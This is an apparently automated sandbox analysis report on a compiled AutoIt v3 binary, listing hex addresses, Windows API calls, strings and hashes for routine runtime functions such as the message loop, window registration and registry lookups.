0x00df5aee
0x00000000
0x00df5aee
0x00df5a5e
0x00df5a5e
0x00df5a64
0x00df5a67
0x00df5a6e
0x00df5a7b
0x00df5a86
0x00df5a91
0x00df5a9e
0x00df5aac
0x00df5aba
0x00df5ac4
0x00df5ac6
0x00df5ad2
0x00000000
0x00df5ad2
0x00df5a69
0x00df5a6c
0x00000000
0x00000000
0x00000000
0x00df5a6c
0x00df5a0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00df59e6
0x00df59e0
0x00dc0e70
0x00dc0e76
0x00dc0e7b
0x00dc0e7d
0x00000000
0x00000000
0x00dc0e7f
0x00dc0f2f
0x00dc0f2f
0x00dc0f36
0x00dc0fa3
0x00000000
0x00dc0fa3
0x00000000
0x00dc0f36
0x00dc0e85
0x00dc0e8b
0x00000000
0x00000000
0x00000000
0x00dc0e8b
0x00dc0c02
0x00df5afa
0x00df5b00
0x00df5b07
0x00df5b35
0x00df5b35
0x00df5b3b
0x00df5b3d
0x00df5b42
0x00df5b46
0x00df5b49
0x00df5b73
0x00df5b76
0x00000000
0x00000000
0x00df5b7c
0x00df5b7c
0x00df5b82
0x00df5b87
0x00df5b8b
0x00df5b8d
0x00df5bd5
0x00df5bd5
0x00df5bdc
0x00df5c10
0x00df5c10
0x00df5c12
0x00df5bde
0x00df5bde
0x00df5be2
0x00df5be6
0x00df5be8
0x00df5bea
0x00df5bea
0x00df5bf0
0x00df5bf8
0x00df5bff
0x00df5c01
0x00df5c01
0x00df5c1d
0x00df5c24
0x00df5c2e
0x00000000
0x00df5c2e
0x00df5b95
0x00df5b9b
0x00df5ba3
0x00df5bbb
0x00df5bc1
0x00df5bc7
0x00df5bcb
0x00000000
0x00df5bcb
0x00df5bb3
0x00df5bb5
0x00000000
0x00000000
0x00000000
0x00df5bb5
0x00df5b50
0x00df5b56
0x00df5b5a
0x00df5b5f
0x00df5b62
0x00df5b67
0x00000000
0x00000000
0x00df5b6d
0x00000000
0x00df5b6d
0x00df5b09
0x00df5b0f
0x00df5b14
0x00df5b16
0x00000000
0x00000000
0x00df5b18
0x00df5b22
0x00df5b22
0x00df5b28
0x00df5b2a
0x00df5864
0x00df586a
0x00df586a
0x00df5874
0x00000000
0x00df5874
0x00df5b1a
0x00df5b20
0x00000000
0x00000000
0x00000000
0x00dc0c11
0x00dc0c14
0x00000000
0x00dc0c35
0x00dc0c35
0x00dc0c38
0x00dc0c3b
0x00dc0c41
0x00dc0c47
0x00df59cb
0x00df59cb
0x00000000
0x00dc0c55
0x00dc0c58
0x00dc0c5e
0x00000000
0x00000000
0x00dc0c67
0x00dc0c6e
0x00dc0c72
0x00dc0c76
0x00dc0c7a
0x00dc0c7c
0x00dc0c80
0x00dc0c84
0x00dc0c88
0x00dc0c8e
0x00dc0d68
0x00dc0d6b
0x00dc0d7a
0x00dc0d7b
0x00dc0d7e
0x00df58ea
0x00df58f9
0x00dc0da6
0x00dc0da6
0x00dc0da8
0x00dc0ca0
0x00dc0ca0
0x00dc0ca6
0x00dc0de6
0x00dc0deb
0x00dc0dee
0x00df5921
0x00df592c
0x00df5931
0x00df5931
0x00dc0df5
0x00dc0dfa
0x00dc0dfd
0x00dc0dfd
0x00dc0cac
0x00dc0cb0
0x00dc0cb4
0x00dc0cb8
0x00dc0cbb
0x00dc0f89
0x00dc0f8c
0x00dc0f8f
0x00000000
0x00000000
0x00dc0f95
0x00000000
0x00df595b
0x00df595d
0x00df5964
0x00df5966
0x00df5966
0x00000000
0x00000000
0x00000000
0x00000000
0x00df5939
0x00df593b
0x00000000
0x00000000
0x00df5941
0x00df5942
0x00df5948
0x00000000
0x00000000
0x00df594e
0x00df5950
0x00000000
0x00000000
0x00df5956
0x00000000
0x00000000
0x00df5973
0x00df597b
0x00000000
0x00000000
0x00df5981
0x00df5983
0x00df598a
0x00df598c
0x00df598c
0x00000000
0x00000000
0x00df59ab
0x00df59ad
0x00000000
0x00000000
0x00df59b3
0x00df59b5
0x00df59b5
0x00df59ba
0x00df59be
0x00df59be
0x00df59c3
0x00000000
0x00000000
0x00df5996
0x00df5998
0x00df599f
0x00df59a1
0x00df59a1
0x00000000
0x00000000
0x00dc0f95
0x00dc0cc1
0x00dc0cc1
0x00dc0cc9
0x00000000
0x00dc0cc9
0x00dc0db5
0x00dc0db8
0x00dc0dbd
0x00000000
0x00000000
0x00df590c
0x00df5911
0x00df5915
0x00000000
0x00df5915
0x00dc0d84
0x00dc0d8b
0x00000000
0x00dc0da1
0x00000000
0x00000000
0x00dc0dc8
0x00dc0dcc
0x00dc0dd4
0x00dc0ddc
0x00000000
0x00000000
0x00df5893
0x00df589e
0x00df58a0
0x00df58a5
0x00df58a7
0x00df58cc
0x00df58d8
0x00df58dc
0x00df58e0
0x00000000
0x00df58e0
0x00df58a9
0x00df58ad
0x00df58b9
0x00df58be
0x00df58c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00dc0d8b
0x00dc0d70
0x00000000
0x00dc0d70
0x00dc0c9b
0x00000000
0x00dc0c9b
0x00dc0c47
0x00dc0c14
0x00dc0b1e
0x00dc0b1e
0x00dc0b25
0x00dc0b2d
0x00dc0b3d
0x00dc0b48
0x00dc0b48
0x00dc0b52
0x00dc0b5a
0x00dc0b61
0x00dc0b63
0x00dc0b68
0x00dc0b6d
0x00dc0b72
0x00dc0f9c
0x00dc0b78
0x00dc0b78
0x00dc0b78
0x00dc0b7e
0x00dc0b90
0x00df4eb0
0x00df4ebc
0x00df4ebf
0x00df4ec4
0x00df4ec9
0x00df4ece
0x00df4ed0
0x00df4ed3
0x00df4ed5
0x00df4ed5
0x00df4eda
0x00df4ee2
0x00df4eec
0x00000000
0x00df4ef2
0x00df4ef9
0x00df4efc
0x00df4f01
0x00df4f03
0x00df4f05
0x00000000
0x00000000
0x00df4f0f
0x00df4f17
0x00df4f1f
0x00df4f27
0x00df4f3f
0x00df4f4a
0x00df4f4e
0x00df4f67
0x00df4f73
0x00df4f7c
0x00df4f94
0x00df4f9f
0x00df4fa3
0x00df4fbc
0x00df4fc8
0x00df4fd1
0x00df4fe9
0x00df4ff4
0x00df4ff8
0x00df5011
0x00df501d
0x00df5022
0x00df5034
0x00df503d
0x00df5044
0x00df5049
0x00df5050
0x00000000
0x00df5050
0x00df4eec
0x00dc0ba4
0x00df505a
0x00df5061
0x00df5076
0x00df5076
0x00df5078
0x00df5078
0x00000000
0x00df5078
0x00df5063
0x00df506a
0x00000000
0x00000000
0x00df506c
0x00df5072
0x00000000
0x00df5072
0x00dc0baa
0x00dc0baa
0x00dc0bb1
0x00dc0bb3
0x00dc0bbc
0x00dc0bc5
0x00dc0bca
0x00dc0bca
0x00dc0bb3
0x00000000
0x00dc0b25
0x00dc0ab0
0x00dc0ab0
0x00dc0abc
0x00dc0ac3
0x00dc0acb
0x00000000
0x00dc0ad0
0x00dc0ad2
0x00000000
0x00dc0ad8
0x00dc0ad8
0x00dc0ad8
0x00dc0ad8
0x00dc0ae0
0x00dc0ae0
0x00dc0ae0
0x00dc0ae2
0x00dc0ae2
0x00dc0ae2
0x00dc0ae8
0x00000000
0x00000000
0x00dc0d54
0x00dc0d56
0x00dc0d5a
0x00df4ea3
0x00df4ea6
0x00dc0ae0
0x00dc0ae0
0x00000000
0x00dc0ae0
0x00dc0d60
0x00dc0d60
0x00dc0aee
0x00dc0af2
0x00dc0afb
0x00000000
0x00dc0b01
0x00dc0b01
0x00dc0b01
0x00000000
0x00dc0b01
0x00dc0afb
0x00dc0d0b
0x00dc0d0b
0x00dc0d0d
0x00dc0d11
0x00dc0d4c
0x00dc0d4c
0x00000000
0x00dc0d4c
0x00dc0d13
0x00dc0d16
0x00dc0d1c
0x00dc0d1e
0x00dc0d20
0x00dc0d22
0x00dc0d28
0x00df4e8e
0x00df4e94
0x00dc0d37
0x00dc0d37
0x00dc0d39
0x00dc0d3b
0x00000000
0x00000000
0x00dc0d3d
0x00dc0f4e
0x00dc0f4e
0x00dc0f5c
0x00dc0f61
0x00dc0f6c
0x00dc0f73
0x00dc0f79
0x00dc0f80
0x00000000
0x00dc0f80
0x00dc0d43
0x00dc0d46
0x00000000
0x00000000
0x00000000
0x00dc0d46
0x00dc0d36
0x00dc0d36
0x00000000
0x00dc0d36
0x00dc0d2e
0x00dc0d34
0x00000000
0x00000000
0x00000000
0x00dc0d34
0x00dc0aa5
0x00df4d1d
0x00dc0a45
0x00df4d22
0x00df4d29
0x00000000
0x00000000
0x00df4d2f
0x00dc0a5f
0x00dc0e10
0x00dc0e10
0x00dc0e18
0x00000000
0x00000000
0x00dc0e1e
0x00dc0e24
0x00dc0e27
0x00df4d34
0x00df4d3a
0x00df4d72
0x00df4d72
0x00000000
0x00df4d72
0x00df4d3c
0x00df4d41
0x00df4d44
0x00df4d46
0x00df4d48
0x00000000
0x00000000
0x00df4d4a
0x00df4d4e
0x00000000
0x00000000
0x00df4d5f
0x00df4d65
0x00df4d67
0x00dc0e43
0x00dc0e55
0x00dc0e57
0x00000000
0x00000000
0x00000000
0x00dc0e5d
0x00df4d6d
0x00dc0e2d
0x00dc0e34
0x00dc0e3a
0x00dc0e3f
0x00dc0e41
0x00dc0ead
0x00dc0ebb
0x00dc0ebb
0x00000000
0x00dc0e41
0x00df4d81
0x00df4d88
0x00df4d88
0x00dc0a65
0x00dc0a6c
0x00df4d97
0x00df4d9e
0x00df4da5
0x00df4da5
0x00dc0a79
0x00df5c39
0x00df5c3e
0x00df5c4e
0x00000000
0x00dc0a7f
0x00dc0a7f
0x00000000
0x00dc0a7f
0x00dc0a79
0x00000000
0x00dc0a1f

APIs

PeekMessageW.USER32 ref: 00DC0A5B
timeGetTime.WINMM ref: 00DC0D16
PeekMessageW.USER32 ref: 00DC0E53
Sleep.KERNEL32(0000000A), ref: 00DC0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00DC0EFA
DestroyWindow.USER32 ref: 00DC0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DC0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00DF4E83
TranslateMessage.USER32(?), ref: 00DF5C60
DispatchMessageW.USER32 ref: 00DF5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DF5C82

Strings

@GUI_WINHANDLE, xrefs: 00DF4F8F
@TRAY_ID, xrefs: 00DF578F
pb, xrefs: 00DF4FAE
@GUI_CTRLID, xrefs: 00DF4F3A
pb, xrefs: 00DF4F59
@COM_EVENTOBJ, xrefs: 00DF54F0
pb, xrefs: 00DF5003
@GUI_CTRLHANDLE, xrefs: 00DF4FE4
pb, xrefs: 00DF57B4

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
API String ID: 4212290369-1420604165
Opcode ID: c6d30a465a20aaafb5c96405d3e1069a3d3707e1e0ece2a75b0e60963adc59e8
Instruction ID: f6c2602b8647eb827a52ec8650c88b8517483fb55037a0eef6446ccb54faacfb
Opcode Fuzzy Hash: c6d30a465a20aaafb5c96405d3e1069a3d3707e1e0ece2a75b0e60963adc59e8
Instruction Fuzzy Hash: DCB2C370608745DFD724DF24D844FAABBE4FF85304F19891DE69A972A1C770E884CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DC5E28, Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 348COMMON

Download Yara Rule

APIs

Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06

GetForegroundWindow.USER32(00E3F910,?,?,?,?,?), ref: 00DC5EE2
IsWindow.USER32(?), ref: 00E00C23

Strings

HANDLE, xrefs: 00E00A06
ALL, xrefs: 00E00B8A
ACTIVE, xrefs: 00E009F0
LAST, xrefs: 00E009DA
TITLE, xrefs: 00E00BB8
REGEXPTITLE, xrefs: 00E00A1C
INSTANCE, xrefs: 00E00B62
CLASS, xrefs: 00E00A4D
REGEXPCLASS, xrefs: 00E00A6E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 516cd303f2e40416ff68ce4b39eef6cbc5b5799317f46d5501d7c04bc966cf85
Instruction ID: 951767d057c59ec0e37d1c74c3d8430e240c3caf1351803ac279d226e319e3ff
Opcode Fuzzy Hash: 516cd303f2e40416ff68ce4b39eef6cbc5b5799317f46d5501d7c04bc966cf85
Instruction Fuzzy Hash: 36D1A530104702EBCB04EF54D485BAABBA4FF94348F14561DF496676E1DB30EA99CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB301C, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00DB3074
RegisterClassExW.USER32 ref: 00DB309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB30AF
InitCommonControlsEx.COMCTL32(?), ref: 00DB30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DB30DC
LoadIconW.USER32(000000A9), ref: 00DB30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DB3101

Strings

AutoIt v3 GUI, xrefs: 00DB3090
TaskbarCreated, xrefs: 00DB30A4
0, xrefs: 00DB3056
+, xrefs: 00DB305D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: df033867626ed9d6fa7df6db2fc534b3a1ef983e9dfa88858c4b4d3d1d73f6ab
Instruction ID: 4a86b35278ab5670e973473baabc510dafd1a552c39b2f9672979c254f0dcac4
Opcode Fuzzy Hash: df033867626ed9d6fa7df6db2fc534b3a1ef983e9dfa88858c4b4d3d1d73f6ab
Instruction Fuzzy Hash: 3D3106B2D41309EFDB40CFA5E889AD9BBF4FB09310F14412AE584B62A0D7B50589CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3041, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00DB3074
RegisterClassExW.USER32 ref: 00DB309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB30AF
InitCommonControlsEx.COMCTL32(?), ref: 00DB30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DB30DC
LoadIconW.USER32(000000A9), ref: 00DB30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DB3101

Strings

AutoIt v3 GUI, xrefs: 00DB3090
TaskbarCreated, xrefs: 00DB30A4
0, xrefs: 00DB3056
+, xrefs: 00DB305D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 85a68d42024e0e5a15e2c77a0ea04ccade8543de926bccefe7412b9698d9db5e
Instruction ID: 6473dd0daa9ebf6db5d612eb5b8d62a5ba60359c6e4284327319ed873098dfae
Opcode Fuzzy Hash: 85a68d42024e0e5a15e2c77a0ea04ccade8543de926bccefe7412b9698d9db5e
Instruction Fuzzy Hash: 9821B4B2D11318AFEB00DFA6E989B9DBFF4FB08700F00412AF515B62A0D7B145888F95

Uniqueness

Uniqueness Score: -1.00%

Function 00DB708B, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00DB715A,?,?,?,?,00DB108C,?), ref: 00DB4724

Part of subcall function 00DD050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DB7165,?,?,?,?,00DB108C,?), ref: 00DD052D

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,00DB108C,?), ref: 00DB71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,00DB108C,?), ref: 00DEE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,00DB108C,?), ref: 00DEE909
RegCloseKey.ADVAPI32(?,?,?,?,?,00DB108C,?), ref: 00DEE947
_wcscat.LIBCMT ref: 00DEE9A0

Strings

Include, xrefs: 00DEE8BF, 00DEE900
\Include\, xrefs: 00DB7165
\, xrefs: 00DEE9C3
Software\AutoIt v3\AutoIt, xrefs: 00DB719E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: eb06efbdb90cf8882efcfb17b6eb49e9acb82b4ab578e5d3c8b8f054c121d4cb
Instruction ID: 3d2c51894555d909c3d44f764c6d3f445be0d425bad41ae778fea5cc5021bd73
Opcode Fuzzy Hash: eb06efbdb90cf8882efcfb17b6eb49e9acb82b4ab578e5d3c8b8f054c121d4cb
Instruction Fuzzy Hash: C0717F715087419EC744EF26EC819ABBBE8FF84354F44092EF449A72B2DB719988CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3633, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00DB36D2
KillTimer.USER32(?,00000001), ref: 00DB36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DB371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB372A
CreatePopupMenu.USER32 ref: 00DB373E
PostQuitMessage.USER32(00000000), ref: 00DB374D

Strings

TaskbarCreated, xrefs: 00DB3725
%, xrefs: 00DED081, 00DED0CF

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%
API String ID: 129472671-3835587964
Opcode ID: e8a6c7bb8144980fa771228864ac0ef95158be0c54e7c9afebd9e734ace92efc
Instruction ID: c0e85b8dd69daee9e3d002ab5c51175a36bb47390bd36b59ded844d1a3f77ccc
Opcode Fuzzy Hash: e8a6c7bb8144980fa771228864ac0ef95158be0c54e7c9afebd9e734ace92efc
Instruction Fuzzy Hash: F64128B2110949FFDB14AF69DC09BF93B55EB00300F580125F547A62B2DEA1DD58A671

Uniqueness

Uniqueness Score: -1.00%

Function 00DB9837, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00DB9862
__swprintf.LIBCMT ref: 00DB98AC
__i64tow.LIBCMT ref: 00DEF5E6

Strings

0x%p, xrefs: 00DEF5C8
%.15g, xrefs: 00DB98A6
False, xrefs: 00DEF5AE
True, xrefs: 00DEF5A7

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 92c585e9ce92e3c0ba752da828311710871f1153ab1d07839c1eeead65901742
Instruction ID: 518de9443c9cdd3940e256de8698dc6fefb01d7ddd1710cb7238828ce3dfe440
Opcode Fuzzy Hash: 92c585e9ce92e3c0ba752da828311710871f1153ab1d07839c1eeead65901742
Instruction Fuzzy Hash: 9841E475500245EFDB24EF35D842EBAB7E9EF45310F24446EE58AD7291EA31E9018B30

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3A46, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00DB3A50
LoadCursorW.USER32(00000000,00007F00), ref: 00DB3A5F
LoadIconW.USER32(00000063), ref: 00DB3A76
LoadIconW.USER32(000000A4), ref: 00DB3A88
LoadIconW.USER32(000000A2), ref: 00DB3A9A
LoadImageW.USER32 ref: 00DB3AC0
RegisterClassExW.USER32 ref: 00DB3B16

Part of subcall function 00DB3041: GetSysColorBrush.USER32(0000000F), ref: 00DB3074
Part of subcall function 00DB3041: RegisterClassExW.USER32 ref: 00DB309E
Part of subcall function 00DB3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB30AF
Part of subcall function 00DB3041: InitCommonControlsEx.COMCTL32(?), ref: 00DB30CC
Part of subcall function 00DB3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DB30DC
Part of subcall function 00DB3041: LoadIconW.USER32(000000A9), ref: 00DB30F2
Part of subcall function 00DB3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DB3101

Strings

0, xrefs: 00DB3AF4
AutoIt v3, xrefs: 00DB3B05
#, xrefs: 00DB3AFB

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 10b887b3adc849aee01319f50ef459883cb851ba9ec07c7e717fa716f51010e2
Instruction ID: 78d38dcbfdcdf66f9c4c903a9fdc17b5199b4aa47abc0a666b70d7a79039d92d
Opcode Fuzzy Hash: 10b887b3adc849aee01319f50ef459883cb851ba9ec07c7e717fa716f51010e2
Instruction Fuzzy Hash: 8B212972D10348AFEB10DFA6EC09B9D7FB1EB08711F10051AF608B62B2D7B555989F94

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3766, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON

Download Yara Rule

Strings

/AutoIt3OutputDebug, xrefs: 00DB3892
/AutoIt3ExecuteLine, xrefs: 00DB38A7
R, xrefs: 00DED213
/AutoIt3ExecuteScript, xrefs: 00DB38BC
CMDLINERAW, xrefs: 00DB37FB
/ErrorStdOut, xrefs: 00DB387D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00DB37AE
CMDLINE, xrefs: 00DB3822

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
API String ID: 1825951767-347772802
Opcode ID: f52d718de36cf49cc356a310be75c636b8cd1119afe4cf5f03785d9b52c2f715
Instruction ID: 49769175610bd0de29f1577acde76e0cf5eb05a41f9f5291001ef89824623184
Opcode Fuzzy Hash: f52d718de36cf49cc356a310be75c636b8cd1119afe4cf5f03785d9b52c2f715
Instruction Fuzzy Hash: D8A1597290025DDADF04EBA5DC95AEEB779FF15300F44052AF416B6192EF70AA08DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DBF76F, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DD0193
Part of subcall function 00DD0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DD019B
Part of subcall function 00DD0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DD01A6
Part of subcall function 00DD0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DD01B1
Part of subcall function 00DD0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DD01B9
Part of subcall function 00DD0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DD01C1

Part of subcall function 00DC60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00DBF930), ref: 00DC6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DBF9CD
OleInitialize.OLE32(00000000), ref: 00DBFA4A
CloseHandle.KERNEL32(00000000), ref: 00DF45C8

Strings

S, xrefs: 00DBF7EB
\T, xrefs: 00DBF7F7
<W, xrefs: 00DBF930
%, xrefs: 00DBF796, 00DBF7A8, 00DBF96E, 00DBFA51

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <W$\T$%$S
API String ID: 1986988660-191198415
Opcode ID: b4cb991a97c7cc7feeddedc55a74ccebd4bf16c7ced93c7e79149a7717f1e74f
